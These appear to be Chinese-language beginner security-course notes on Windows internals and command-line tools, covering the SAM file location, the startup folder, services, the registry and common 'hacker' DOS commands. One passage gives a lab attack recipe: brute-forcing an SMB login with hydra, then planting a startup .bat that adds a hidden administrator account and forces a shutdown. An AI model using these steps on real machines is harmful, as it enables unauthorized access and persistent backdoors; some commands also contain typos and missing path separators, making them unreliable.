1. 系统目录、服务、端口、注册表
目录
C盘初始的5个目录,日志目录,程序目录,用户目录(创建用户所产生的文件),Windows目录
C:WindowsSystem32config:这个目录里面存放着一些系统文件,像SAM这个文件存放着Windows的账号和密码
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup 这个目录里面存放的程序可以让该用户开机自动运行此程序
服务
打开服务:1. 右击我的电脑打开“计算机管理”
2. Crtl + r打开运行——输入“services.msc” 回车打开
常见的服务
web服务;dns服务;dhcp服务;邮件服务;Telnet服务;ssh服务;ftp服务;smb服务
端口
注册表
注册表是Windows中一个重要的数据库,用于存储系统和应用程序的设置信息。
打开注册表——win+r,输入regedit
2. 黑客常用DOS命令及批处理文件的编写
color
ping -t -l 65550 ip
ipconfig /release 释放IP
ipconfig /renew 重新获取IP
systeminfo 查看系统信息
arp -a 显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
net view 查看局域网中其他计算机
shutdown -s(关机) -r(重启) -t(多少秒之后执行) -c(提示)
shutdown -a 取消操作
cd 切换目录
dir 查看目录
type 在cmd中将文件打开
start 在系统中将文件打开
copy con c:123.txt,输入命令后在回车,在下面输入要嵌入的内容,摁下Ctrl+ z,再摁回车保存
type nul> 456.txt 同样是创建文件,不过这个是空文件
rd 删除文件夹
del 删除文件
copy 复制文件
move 移动文件
ren 源文件名 更改后的名称 改名(可以改文件也可以文件夹)
net use k: \192.168.21.130c$ 把目标主机的c盘挂载为当前主机的k盘
net start 查看已经开启的服务
net start/stop 服务
net user 查看已有用户
net user guest /active :yes 激活guest用户
net user 用户名 密码 /add
net user 用户名 密码 /del
net localgroup administrator 用户名 /add
net user 用户名 12345 更改指定用户的密码
netstat -a 查看开启了那些端口 -n 查看端口的网络连接状态常用 -an
netstat -v 查看正在进行的工作
attrib 文件名(目录名)查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或+A +R +S +H 去掉(添加)某文件的存档,只读,系统,隐藏,属性
批处理文件: dos命令的组合文件,写在批处理文件的命令会被住哟执行。后缀名为.bat
例如:这里对虚机进行破解登录,首先使用hydra -l Administrator -P pass.txt 192.168.21.130 smb 来破解密码,成功后进入用户的开机启动目录k:Documents and SettingsAdministrator[开始][启动],创建.bat批处理文件,
$ copy con 123.bat net user hacher /add net localgroup administrators hacker /add shutdown -s -t 180 -c "you have hacked by hacker" ^Z
这样,用户就会开机自动执行此命令,进行关机,并且我们已经在用户机器中留下后门—管理员账号
3. 黑客常用的快捷键,以及如何优化系统
4. 登录密码破解、手动清除木马病毒
U盘开机破解密码、lc5密码破解
手动清除木马:查找开机启动项(注意是否有隐藏文件、查询服务、查看网络端口链接)